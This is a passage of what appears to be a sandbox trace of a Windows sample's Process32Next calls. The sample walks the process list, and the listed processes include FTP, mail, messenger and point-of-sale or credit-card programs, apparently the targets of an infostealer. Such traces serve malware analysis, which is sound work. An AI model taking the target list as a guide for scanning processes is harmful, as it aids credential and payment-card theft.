lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0258.513] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.515] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.516] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0258.517] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.519] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.520] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.522] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.523] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.524] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.526] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.609] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0258.611] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0258.613] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0258.615] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.617] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.619] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0258.622] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0258.624] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0258.626] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0258.628] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.630] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0258.632] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0258.634] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0258.636] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0258.638] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0258.640] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0258.642] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0258.644] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0258.646] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0258.647] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0258.649] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0258.748] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0258.749] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0258.751] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0258.752] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0258.754] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0258.755] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0258.757] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0258.758] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0258.759] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0258.761] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0258.764] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0258.765] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0258.767] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0258.768] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0258.770] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0258.771] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0258.772] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0258.774] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0258.775] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0258.779] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0258.780] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0258.782] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0258.784] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0258.785] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0258.787] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0258.789] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0258.790] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0258.827] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0258.828] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0258.830] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0258.832] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0258.833] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0258.835] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0258.837] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0258.842] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0258.844] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0258.846] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0258.848] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0258.851] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0258.853] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0258.859] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0258.862] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0258.864] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0258.866] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0258.868] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0258.889] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0258.891] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0258.892] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0258.894] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0258.895] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0258.897] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0258.898] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 